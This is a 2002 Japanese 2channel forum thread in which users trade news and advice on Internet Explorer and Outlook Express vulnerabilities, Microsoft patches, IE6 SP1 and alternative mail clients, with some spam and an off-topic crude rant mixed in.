>>91-92はBecky!の話題です。OEと勘違いしてませんか?

96 :94:02/07/12 18:40
>>95
ああ、確かにOEと勘違いしてました。スマン。
鬱田シノウ


97 :名無しさん@お腹いっぱい。:02/07/12 22:47
IE6なんですけど、最近ネットしてるとHDDがカリカリいって、少しフリーズして
「このエラーを鯖に送信しますか」とメッセージが出てIEが終了します
何度も同じエラーが起こるので、修復しましたが、又同じエラーがでます
アップデートも、ちゃんとしてるのに原因はなんでしょうか?

98 :名無しさん@お腹いっぱい。:02/07/12 22:49
>>97 仕様だよ(w 漏れのもたまに出るよ。

99 :名無しさん@お腹いっぱい。:02/07/12 23:05
>>98
たまじゃなくて、毎日出ますよ〜 修正パッチとか無いのかな?

100 :名無しさん@お腹いっぱい。:02/07/12 23:13
うんな糞、使わなければ解決だ(w

101 :名無しさん@お腹いっぱい。:02/07/13 00:35
>>97
俺もだ

102 :名無しさん@お腹いっぱい。:02/07/13 01:15
>>94
WebBUG仕込まれるぞ。

103 :Frethem蔓延中:02/07/15 17:29
WORM_FETHEM、W32.Frethem.J@mmはInternet Explorerのセキュリティホールを突く
ので、OEのプレビューだけで感染します。プレビューOFFにする、最新のバージョンに
しておくこと。
IE/OEの最新バージョン情報は>>55 プレビューの切り方>>11
バージョン確認方法はhttp://www2.ocn.ne.jp/~circle/IE_version.htm

104 :名無しさん@お腹いっぱい。:02/07/15 17:33
バージョン確認方法リンク切れスマソ。
IE:ヘルプ→バージョン情報

105 :名無しさん@お腹いっぱい。:02/07/17 12:51
それにしても、いいかげんプレビューで感染は言わなくてもいいのに決まり文句になってるね。
もう6か5.5SP2(か5.01SP2)にしてないでプレビューで感染したら自業自得だと思う。
(あえて前の使ってる人は最低でもプレビューなんかしてないはず)
新しい穴の予知でもしてるのかな

106 :名無しさん@お腹いっぱい。:02/07/17 13:16
>>105 いまだに知らない人がいるのだからプレビュー感染告知して当然だろ。
自分が知っているからといって、自業自得は言い過ぎ。

107 :名無しさん@お腹いっぱい。:02/07/17 16:13
>>3-4
《MS02-009》を適用したが「q318089」が表示されないぞ。

winMe
ie6標準インストール



108 :名無しさん@お腹いっぱい。:02/07/17 18:23
このスレの8を見てみそ

109 :名無しさん@お腹いっぱい。:02/07/18 11:19
あの〜 初心者的な質問かも知れませんけど、、

OEのメールログファイル(.dbxファイル)の中身をワードパッドで見ると、
ほとんどの中身は暗号化されてて解らないんですけど、
はじめと終わりの方だけ暗号化されてなくて、
しかも,内容が2chのログとかなんです。

2chみるのはかちゅーしゃ使ってますけど、OEのログファイルに
かちゅのログが残るって変ですよね??
virusは検出されてないんですけど、何が問題なんでしょうか?


110 :名無しさん@お腹いっぱい。:02/07/18 11:37
>>109 気にすることはないと思う。
確かめてみたが一部にInternet Explorerの履歴が残っているみたいだ。
かちゅはIEのコンポーネント使ってたっけ?

111 :名無しさん@お腹いっぱい。:02/07/18 11:54
>>106
> 自分が知っているからといって、自業自得は言い過ぎ
そうか?
105ではないけど、半ば自業自得だと思う。
プレビューしただけで感染する危険性があるっていう情報は、
2ちゃんでなくても、ネット上でいやと言うほど溢れてるわけだし。
("プレビュー感染"は事あるごとに告知するべきだとは思う)

そもそもウィルスに感染する大半は、
セキュリティ関連情報を収集するようなこともせず、
当然 バージョンアップもパッチあてもしないで、
デフォで使っている初心者or初級レベルのユーザーだろ。
("大半"は言い過ぎかもしれんが、過半数以上はそうだと思う)

初心者だからこそ情報収集を積極的にしなきゃいかんし、
どんな理由であれ、それをしないのはユーザーの怠慢だと思う。


112 :名無しさん@お腹いっぱい。:02/07/18 11:59
>>110
つこてる

113 :名無しさん@お腹いっぱい。:02/07/18 12:02
>>112 Thanks.

114 :名無しさん@お腹いっぱい。:02/08/02 12:57
MS02-027Gopher問題のIE用パッチなかなか出ないなぁ。
IE6SP1はいつ出るのやら・・・

115 :名無しさん@お腹いっぱい。:02/08/15 11:27
MS02-027Gopher問題のIE用パッチなかなか出ないなぁ。
IE6SP1はいつ出るのやら・・・

116 :名無しさん@お腹いっぱい。:02/08/23 09:54
>>114-115
「MS02-047: Internet Explorer 用の累積的な修正プログラム (Q323759)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-047ov.asp
にてGopher問題に対処。
http://pc.2ch.net/test/read.cgi/sec/1005605775/755

117 :IE最新バージョン:02/08/23 11:48
・以下のバージョンでかつQ323759がついていればOK。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2またはSP3のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
のいずれか。
・Q323759がついてなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047ov.asp
の修正パッチを当てる。
・MS02-009については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ ms02-009.asp
バージョンに表示されません。

なお、Q323759の対象からNT4.0SP6aがはずされたのでIE5.01SP2はWindows2000でのみ最新状態となった。
Q323759は以前に公開された MS02-023 : 2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログラム (Q321232) の修正を含む。

118 :IE最新バージョン:02/08/23 11:51
MS02-009のリンクがうまく行ってないので再度スマソ

・以下のバージョンでかつQ323759がついていればOK。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2またはSP3のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
のいずれか。
・Q323759がついてなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047ov.asp
の修正パッチを当てる。
・MS02-009については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
バージョンに表示されません。

なお、Q323759の対象からNT4.0SP6aがはずされたのでIE5.01SP2はWindows2000でのみ最新状態となった。
Q323759は以前に公開された MS02-023 : 2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログラム (Q321232)
の修正を含む。

119 :名無しさん@お腹いっぱい。:02/08/28 12:03
保全あげ

120 :名無しさん@お腹いっぱい。:02/08/29 18:12
Netscapeブラウザ利用者、さらに減少

 米Web解析サービス会社WebSideStoryのStatMarket部門は8月28日、Netscapeのブラウザを使うWebサーファーの割合が、全世界で3.4%にまで減少したと報告した。同ブラウザのシェアは1年前は13%、今年3月の時点では7%と報告されていた。

 一方、MicrosoftのInternet Explorer(IE)を使うWebサーファーの割合は引き続き増加しており、前年の87%から96%に拡大したという。

 同社の報告では、2002年8月26日現在、MicrosoftとNetscape以外のブラウザを使っている人の割合は全世界で0.64%。

 なおオランダのWeb調査会社OneStat.comも6月に、Netscapeブラウザ全体のシェアは3.4%と報告している。(ZDNet)

http://headlines.yahoo.co.jp/hl?a=20020829-00000024-zdn-sci

0.64%の人は手あげて

121 :名無しさん@お腹いっぱい。:02/08/29 18:16
>>118の通りにし、
5.5SP2用にQ323759をインストールしました。
バージョン確認の「バージョン」でも、Q323759がありました。

しかしUAは
HTTP_USER_AGENT . Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; T312461)
と出ます。これで問題ないんですよね?

122 :名無しさん@お腹いっぱい。:02/08/29 18:37
誰もUAに出るとは言ってないんだが。

123 :名無しさん@お腹いっぱい。:02/08/30 11:36
>>120 Opera6.05使ってんだけど、Cookieの自動再読み込みしない仕様らしく
強制cookie制導入後はすんなり書きこめないことが多いんだな。結局2ちゃん
書き込み用にIE使うハメに…

124 :名無しさん@お腹いっぱい。:02/09/08 01:51
ウィルス対策で「プレビューウィンドウの表示をOFFにしろ」というのさんざん言われて
いるが使いにくいので普段OFFにしていない人も多いだろう。
プレビューウィンドウの表示/非表示切り替えるのにいちいち「表示」-「レイアウト」
と選択していくのは面倒なのでワンクリックでプレビューウィンドウの表示/非表示を切
り替える方法はないのか(たぶんないんだろうなあ)と思ってこの前OEの設定をいじって
たらあるんだね。ツールバーにプレビューボタンを追加すればいいだけだよ。
今までこんなことも知らなかったとは・・・。
これでOEもかなり使いやすくなったよ。といいつつメーラーとしてはメインで使ってない
けど。

方法はツールバー上で右クリックして「カスタマイズ」→「ツールバーの変更」でプレビ
ューボタンを追加


125 :あぼーん:あぼーん
あぼーん

126 :スーパーハカー:02/09/08 07:53
テスト3 

127 :二つ目のお気に入りとして:02/09/08 08:25


究極の総合リンク集

http://home9.highway.ne.jp/cym10262/



128 :名無しさん@お腹いっぱい。:02/09/09 08:59
>>123 「選択したサーバーのクッキーのみを受け入れる」で2chを選択したサーバーに加えても書き込めないことが多いようだ。<Opera
「自動的にすべてのクッキーを受け入れる」にすると書き込める。
そうすると他のサイトでクッキーを食らってしまうので「終了時に新たなクッキー
を破棄する」にチェックを入れる。
さらにFW製品(NISなど)で他のサイトのクッキーを制限するといい。

129 :名無しさん@お腹いっぱい。:02/09/09 18:15
MicrosoftがIE 6 Service Pack 1を準備中
Microsoftが,Internet Explorer(IE) 6 Service Pack 1(SP1)を準備して
いることが 明らかになった。
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020909/1/

http://pc.2ch.net/test/read.cgi/sec/1005605775/795とマルチスマソ

130 :深刻度「高」:02/09/10 21:07
IEスレにも貼ったけど、OEも関係してるようなので一応

IE に新たな脆弱性、イスラエル企業が警告
http://japan.internet.com/webtech/20020910/10.html

131 :名無しさん@お腹いっぱい。:02/09/10 22:17
>>130 Thanks!とりあえず Active Scripting無効にするよ。

132 :名無しさん@お腹いっぱい。:02/09/12 17:53
sp1でプレーンテキストでの表示が可能になったとか

133 :名無しさん@お腹いっぱい。:02/09/12 18:20
>132 ソースキボンヌ

134 :名無しさん@お腹いっぱい。:02/09/12 18:33
http://yahooo.s2.x-beat.com/

135 :名無しさん@お腹いっぱい。:02/09/12 19:44
SP1英語版入れたよ。
確かにoption>read>reading messagesのところの上から四番目の項目に、
Read all messages in plain textってのが出来てるね。
まあOEは使ってないからね。

BECKYにも当然のことなが同じようなconvert to plain textっていう項目があるよ。

136 :名無しさん@お腹いっぱい。:02/09/12 21:26
漏れも英語版入れた
したらVMLだかのインストール失敗しますとさ
鬱だ

137 :名無しさん@お腹いっぱい。:02/09/12 22:38
どうせなら江戸マックスみたいにツールバーから変えられればええのに

138 :名無しさん@お腹いっぱい。:02/09/13 00:40
プレーンテキストで読めるって事はプレビューでの危険性が
減るって事?

139 :名無しさん@お腹いっぱい。:02/09/13 08:05
>>138 そだね。M$のやることだから油断は禁物だが。

140 :名無しさん@お腹いっぱい。:02/09/14 13:42
IE6SP1、まだ英語版、ドイツ語版、フランス語版しかリリースされてないね。

141 :名無しさん@お腹いっぱい。:02/09/15 08:23
MSの鯖の中にコソーリ入ってた。
http://download.microsoft.com/download/ie6sp1/finrel/6_sp1/W98NT42KMeXP/JA/ie6setup.exe

142 :名無しさん@お腹いっぱい。:02/09/15 08:50
↑コンポーネント入ってなかった。

143 :名無しさん@お腹いっぱい。:02/09/19 07:27
IE6SP1出たよ。
HTMLメールをテキスト形式で表示できるようになった。
Japaneseを選択してね。
ttp://www.microsoft.com/windows/ie/downloads/critical/ie6sp1/default.asp

144 :名無しさん@お腹いっぱい。:02/09/19 07:47
日本語のDLページもできたみたいだ。
ttp://www.microsoft.com/windows/ie_intl/ja/

145 :名無しさん@お腹いっぱい。:02/09/19 09:11
>>143-144 サンクス 落としてみた。

IE Version:6.0.2800.1106 更新バージョンSP1
OE 6.00.28000.1106

になった。


146 :名無しさん@お腹いっぱい。:02/09/19 12:30
OEのセキュリティが向上したよ。
これまでできなかったHTMLメールのテキスト表示が可能になった。
IEではファイルのダウンロード時のダイアログに安全性に関する
警告文が出るようになった。

それからMicrosoft の説明によると。
「Internet Explorer 6 での懸案事項を解決したアップデート ファイルの集積です」
だそうですよ。

147 :名無しさん@お腹いっぱい。:02/09/19 12:38
OEって一つのメールを開いた状態でそのメールを削除すると自動的に
次のメールが開くんだよな。そのメールを削除したいだけで次のメールを
開くかどうかについては何も指示してないのに勝手に開く。次のメールがウィルスメールだったりしたら危険だと思う。アンチウィルス入れてれば
いいんだけど、やはり嫌だ。

148 :名無しさん@お腹いっぱい。:02/09/19 12:43
削除する時だけツールバーのボタンでプレビュー表示にしなければいいじゃない。

149 :名無しさん@お腹いっぱい。:02/09/19 13:04
>>148 プレビュー切ってても、メールを開いたままで削除ボタンを押すと
次のメールに切る変わるんだよ。

150 :名無しさん@お腹いっぱい。:02/09/19 14:01
7634KBから落ちないぞおおおおお

151 :名無しさん@お腹いっぱい。:02/09/19 14:09
「MS02-052: Microsoft VM JDBC クラスの問題により、コードが実行される (Q329077)」
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-052ov.asp

152 :名無しさん@お腹いっぱい。:02/09/19 14:39
>>149
実際にメール開いたまま削除してみたら、
おっしゃることがよく分かりました。
開いたまま削除することなど今までやったことが無かったもので。

153 :名無しさん@お腹いっぱい。:02/09/19 15:09
>>147-152
古いIEを使ってて、来たメールを読んで開いたまま削除すると次のメールが
MS01-020のセキュリティホール突くものだった場合にヤバイね。
その場合でもアンチウィルスソフトが常駐してれば大丈夫だけど。

154 :名無しさん@お腹いっぱい。:02/09/19 15:18
>>151
さんくすこ
さっきIE入れたのにまたぱっち当てるの・・・
めんどくさーーーい!!けど無事終了。
メーラーはOEを使わないが吉ですな


155 :名無しさん@お腹いっぱい。:02/09/19 15:30
>>151 Windwos Updateで可能。ただし前提条件があるので>151のサイトで
バージョン等確かめてからパッチ当てること。

156 :名無しさん@お腹いっぱい。:02/09/19 16:06
>>151 関連記事
Microsoft VMに深刻なセキュリティ・ホール,すべてのWindowsユーザーが対策を
マシンを乗っ取られる恐れあり,Windows Updateでパッチを適用する
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020919/2/

マイクロソフト,Windows XP SP1とIE 6 SP1の各日本語版を提供開始
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020919/1/

157 :名無しさん@お腹いっぱい。:02/09/20 01:57
SP1入れたけど
これどこまでのパッチあたってるの?

158 :名無しさん@お腹いっぱい。:02/09/20 04:11
>>146
SP1入れてみたが
OEのテキスト→HTMLの切り替えはオプション画面でやるみたいやね。

ベッキや江戸みたいにメイン画面からワンクリックで切り替わる機能が無いぶん
初心者には安全性は高いが、
雛型メールとか乱発送信してる連中には、いろいろトラブルもありそうだ(W


159 :158:02/09/20 04:15
補足。
いったんテキスト表示に設定したあと、
テキスト→HTML表示の切り替えって意味ね(^^;

160 :名無しさん@お腹いっぱい。:02/09/20 10:30
>>157 Internet Explorer 用の累積的な修正プログラム (Q323759) (MS02-047)
まで含んでいるようだ。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047.asp

161 :名無しさん@お腹いっぱい。:02/09/20 13:56
SP1を入れないと、どうなるんですか?
昨日入れたんだけど、IEに繋がらなくなって削除したんだけど
やっぱ入れたほうがいいんですか?

162 :名無しさん@お腹いっぱい。:02/09/20 15:30
>IEに繋がらなくなって

IE6に>>118の状態であればとりあえずはOKだけど(Gopher問題が残るが)。
そうでないとレアケースだがマシンが乗っ取られたりセキュリティ上の問題がある。
パッチ当てたりするときはFWやアンチウィルスなど常駐アプリを停止した上で
当てないと不具合でることあり。

163 :名無しさん@お腹いっぱい。:02/09/21 12:58
本日HDが壊れて再インストール中。
本ちゃん入れてSP1を入れてから、Updateかけるも該当なし。
>>157 Internet Explorer 用の累積的な修正プログラム (Q323759) (MS02-047)
まで含んでいるようだ。
ありがとさん。
それは、
「この問題に対する修正は Windows XP Service Pack 1 以降に含まれています。」
という記述がネタ元?
ということは、MS02-050、51はあてなあかんねんな。
MSは一覧表位作れっちゅうんねん。

164 :名無しさん@お腹いっぱい。:02/09/26 00:47
ア、アー・・・アレクサ!!

165 :名無しさん@お腹いっぱい。:02/10/03 08:29
証明書確認の問題により、ID が偽装される (Q328145) (MS02-050)
今回の更新内容
Outlook Express for Mac の問題を修正するプログラムを公開しました。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-050.asp

166 :セキュリティ情報:02/10/03 14:23
OEではなくWindows絡みだが、
「MS02-054: ファイル展開機能に含まれる未チェックのバッファにより、コードが実行される (Q323284)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-054ov.asp
対象となる製品(以下同じ)
・ Microsoft Windows 98
(Microsoft Plus! 98 をインストールしている環境)
・ Microsoft Windows 98 Second Edition
(Microsoft Plus! 98 をインストールしている環境)
・ Microsoft Windows Millennium Edition
・ Microsoft Windows XP
「MS02-055: Windows ヘルプ機能の未チェックのバッファにより、コードが実行される (Q323255)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-055ov.asp
・ Microsoft Windows 98
・ Microsoft Windows 98 Second Edition
・ Microsoft Windows Millennium Edition
・ Microsoft Windows NT 4.0
・ Microsoft Windows NT 4.0 Terminal Server Edition
・ Microsoft Windows 2000
・ Microsoft Windows XP
「MS02-056: SQL Server 用の累積的な修正プログラム (Q316333)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-056ov.asp
・ Microsoft SQL Server 7.0
・ Microsoft Desktop Engine (MSDE) 1.0
・ Microsoft SQL Server 2000
・ Microsoft Desktop Engine (MSDE) 2000
「MS02-057: Services for Unix 3.0 に含まれる Interix SDKでサービス拒否が起こる (Q329209)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-057ov.asp
・ Microsoft Windows NT 4.0
・ Microsoft Windows 2000
・ Microsoft Windows XP

167 :名無しさん@お腹いっぱい。:02/10/05 00:11
age

168 :IE最新バージョンまとめ:02/10/07 12:00
・Windows95
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2でQ323759がついていること
・Windows98/ME
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6(フルまたは標準インストールのこと)でQ323759がついていること
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること
・WindowsNT4.0SP6a
6.00.2800.1106 Internet Explorer 6 Service Pack 1
・Windows2000
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.00.3315.1000 Internet Explorer 5.01 SP2 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
・WindowsXP
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること
※インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
※Q323759は
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047ov.asp
の修正パッチを当てる。
※MS02-009,MS02-050については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-050.asp
バージョンに表示されません。

なお、Q323759の対象からNT4.0SP6aがはずされたのでIE5.01SP2はWindows2000でのみ最新状態となっ た。
Q323759は以前に公開された MS02-023 : 2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログ ラム (Q321232)
の修正を含む。
IE6SP1は MS02-047:累積的な修正プログラム (Q323759) の修正まで含む

169 :訂正1:02/10/07 12:44
WindowsNT4.0SP6aに漏れがありました。またQ323759がIE5.5SP1にも用意されたのでIE5.5SP1にQ323759でもOK。

・Windows95
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること
5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること
・Windows98/ME
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6(フルまたは標準インストールのこと)でQ323759がついていること
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること
5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること
・WindowsNT4.0SP6a
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること
5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること

170 :訂正2:02/10/07 12:45
・Windows2000
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.00.3315.1000 Internet Explorer 5.01 SP2 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
・WindowsXP
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること
※インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
※Q323759は
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047ov.asp
の修正パッチを当てる。
※MS02-009,MS02-050については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-050.asp
バージョンに表示されません。
なお、Q323759は以前に公開された MS02-023 : 2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログ ラム (Q321232)の修正を含む。
IE6SP1は MS02-047:累積的な修正プログラム (Q323759) の修正まで含む

171 :名無しさん@お腹いっぱい。:02/10/07 20:13
「IE6 SP1を適用して,Outlook Expressで HTMLを表示しない設定に」
――IPAが呼びかけ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021007/1/
コンピュータウイルスの届出状況について[要旨]
http://www.ipa.go.jp/security/txt/2002_10outline.html

172 :名無しさん@お腹いっぱい。:02/10/07 21:54
なんでいまだにIEやOE使ってるの?
パッチ貼るのが趣味ですか?
会社用でやむを得ずが大半だとは思うが・・それにしても・・

173 :名無しさん@お腹いっぱい。:02/10/07 22:21
>>172
OEは使わないでおくことが可能だが、WindowsOS使ってて
IE使わないで済む人はまずいない。組み込みコンポーネント
なんだから。

174 :名無しさん@お腹いっぱい。:02/10/07 22:30
>>172
パッチはるのが唯一の楽しみでございます

175 :名無しさん@お腹いっぱい。:02/10/07 22:35
むしろ会社でこそIE・OEは使わん。万が一があった場合に取引先に対する
信用問題になっちまう。

176 :名無しさん@お腹いっぱい。:02/10/07 22:45
会社では、オークションとかロトとかやってるヤツは、
警告アナウンス無視で OE やってます。
この前 IE6SP1 アナウンスしてやったら、エラーになったと
文句メールがきたさぁ。。。

177 :名無しさん@お腹いっぱい。:02/10/07 23:40
俺のブラウザツギハギだらけ

178 :名無しさん@お腹いっぱい。:02/10/08 00:25
>WindowsOS使っててIE使わないで済む人はまずいない。
組み込みコンポーネントなんだから。

そりゃ大変だねぇ(w


179 :名無しさん@お腹いっぱい。:02/10/08 19:15
ネットに関して危機感が持てる。

180 :名無しさん@お腹いっぱい。:02/10/11 09:24
「MS02-058: Outlook Express の S/MIME 解析の未チェックのバッファによりシステムが侵害される(Q328676)」

この問題は、下記製品の S/MIME コントロールに含まれる未チェックの
バッファにより、不正なプログラムが実行される可能性がある問題です。
最悪の場合、悪意のあるユーザーにお客様のコンピューター上で任意の
プログラムが実行される可能性があります。
対象となる製品
・ Microsoft Outlook Express 6
・ Microsoft Outlook Express 5.5
修正プログラム
・ Microsoft Outlook Express 6
http://download.microsoft.com/download/IE60/oepac_29/6/W98NT42KMeXP/JA/q328676.exe
・ Microsoft Outlook Express 5.5
http://download.microsoft.com/download/ie55sp2/oepac_29/5.5_sp2/W98NT42KMe/JA/q328389.exe
備考: Outlook Express 5.5 用の修正プログラムのファイル名は、
本セキュリティ情報の文書番号 (Q328676) とは異なっています。

MS02-058: Unchecked Buffer in Outlook Express S/MIME Parsing Could
Enable System Compromise (Q328676)
http://www.microsoft.com/technet/security/bulletin/MS02-058.asp

181 :名無しさん@お腹いっぱい。:02/10/11 09:25
「MS02-058: Outlook Express の S/MIME 解析の未チェックのバッファによりシステムが侵害される(Q328676)」
詳細
この修正プログラムをインストールすることにより、
悪意のあるユーザーによる以下の攻撃を防ぐことができます。

(高) S/MIME コントロールの脆弱性を悪用し、
バッファのオーバーラン攻撃が行われる問題です。

対策が行われていないシステムがインターネットなどのネットワークを通じて
他のコンピュータと接続している場合、この問題を悪用した攻撃を
受けることがあります。この攻撃は、受動的攻撃という悪意のある
ユーザーから送られた HTML 形式の電子メールからも攻撃を受ける
可能性があります。この攻撃は、ハッカーまたはクラッカーと呼ばれる
悪意のあるユーザーや、ワームといった自動的な攻撃を目的とした悪意のある
プログラムから行われることがあります。

この脆弱性を悪用されることにより、
以下のような実害を受ける事が考えられます。

・ 実行する意図の無いアプリケーションが動作させられる可能性があります
(ハードディスクのフォーマットやワームなど)
・ Outlook Express が異常停止する可能性があります

182 :名無しさん@お腹いっぱい。:02/10/11 09:36
Q328676をインストールしようとすると
"この修正プログラムをインストールするにはInternetExplorer6.0が必要です。"
って出てエラーになってしまいます。

使ってるのがIE6SP1だからでしょうか?

183 :名無しさん@お腹いっぱい。:02/10/11 09:46
>>182
WindowsXPSP1とInternet Explorer6SP1にはこの修正はすでに含まれてるので
パッチ不要。
I’m up to date on all service packs for my system. Do I need the patch?

The fix for this issue was included in Windows XP Service Pack 1, and in Internet Explorer 6.0 Service Pack 1. If you’ve installed either of these two service packs, you’re already protected against the vulnerability and don’t need the patch.
http://www.microsoft.com/technet/security/bulletin/MS02-058.asp

184 :名無しさん@お腹いっぱい。:02/10/11 10:31
おまえら真面目にやれよ!!!
アニヲタの自覚あんのかよ!!
ラムが基本なんだよ!すべてはここから始まるんだよ!!
原作を完読しれっ!!TVシリーズを10日で全部見ろっ!!
亜空間アルバイトの回やつるつるセッケンの回をキャプしろっ!!!
口付け宅急便の扉絵を涎と精液でドロドロにしろっ!!!
話 は そ れ か ら な ん だ よ !!!
他のキャラに走るのはラムが卒業できてからなんだよ!!!
たとえ卒業できなくたって構やしねぇんだよっ!!!
原点なんだよ!!!伝説なんだよ!!!神話なんだよ!!!
ラム語れねぇヤシが偉そうな口たたくんじゃねぇよっ!!!
卒業できねぇヤシが『本気ラム』なんだよっ!!
もう一回言うぞっ!!!
おまいら真面目にやれよっっっ!!!!


185 :MS02-058:02/10/11 13:08
解説:
Outlook Expressに深刻なホール,特定メールのプレビュで任意のコードを実行される
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021011/1/
対策はパッチの適用,ただしXP SP1とIE6 SP1では対策済み

MS日本語要約情報
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-058ov.asp


186 :182:02/10/11 13:51
>>183
ご親切にありがとうございました。

187 :名無しさん@お腹いっぱい。:02/10/11 23:06
いい加減 江戸マックスとかのフリーのまともなメーラーに替えたら?
なんでOEなんていつまでも使ってるわけ? マゾですか? 

188 :名無しさん@お腹いっぱい。:02/10/11 23:54
江戸マックス、そろそろ枯れてきて、いい塩梅
秀丸、枯れすぎた これもスバラスィ

189 :名無しさん@お腹いっぱい。:02/10/11 23:55
>>187
馬鹿ですか? このスレタイトルの意味わかんないの?
edmaxもIEコンポーネント使用メーラーなんだけど。

190 :名無しさん@お腹いっぱい。:02/10/11 23:59
IEコンポーネント、使わなきゃエエべ

191 :名無しさん@お腹いっぱい。:02/10/12 00:19
MS02-058 は激しくヤバいね。
これって、以前NimdaやBadtransの大流行を招いた
原因と同じじゃない?
メールを受信しただけで感染させるウイルスとか出そてきそう。

今度こそ、OE使うのはきっぱりやめようね。


192 :名無しさん@お腹いっぱい。:02/10/12 00:20
>>191
べつにぃ、、、OE SP1 ですが、何か?

193 :名無しさん@お腹いっぱい。:02/10/12 10:12
>>191
任意のコードの実行というところだけに反応してageるんじゃねーぞぼけ。
かなーり違う。


194 :名無しさん@お腹いっぱい。:02/10/12 10:43
OEヲタ必死だな

195 :名無しさん@お腹いっぱい。:02/10/12 11:00
>>194
「OEヲタ」じゃないが、何か?
メインメーラーは別のものだが、OE 初心者ユーザーが
ゴロゴロいるんで、その対応のため動作確認のためだけに
入れているだけだ。(藁

196 :名無しさん@お腹いっぱい。:02/10/12 11:05
>>194 脱IE・OEのススメ
http://pc.2ch.net/test/read.cgi/sec/1033069892/l50
でやったら?

197 :名無しさん@お腹いっぱい。:02/10/12 12:49
OEは糞という奴はたくさんいるけど、じゃあ代わりに何を使えばいいんだ?
という問いに的確に回答で切る奴は殆どいない。

IEコンポーネント未使用で完全に無料(ウザイ広告付加)で使える物列挙してみろよ。

198 :名無しさん@お腹いっぱい。 :02/10/12 14:18
NIFTYのウェブメール。


199 :名無しさん@お腹いっぱい。:02/10/12 17:09
電八はIEコンポーネント使ってないような気がする…。
初心者にはお薦めしないが(w

200 :名無しさん@お腹いっぱい。:02/10/12 21:20
>>197
なんでも無料だと思ってる奴は馬鹿。そもそもOEだって無料というわけじゃないだろ。

201 :名無しさん@お腹いっぱい。:02/10/12 21:36
197は精神を病んでるな・・

202 :名無しさん@お腹いっぱい。:02/10/12 21:51
ネスケ付属の奴とか。

203 :名無しさん@お腹いっぱい。:02/10/12 23:04
>>200-201
ごたくは良いから無料の奴挙げろ。

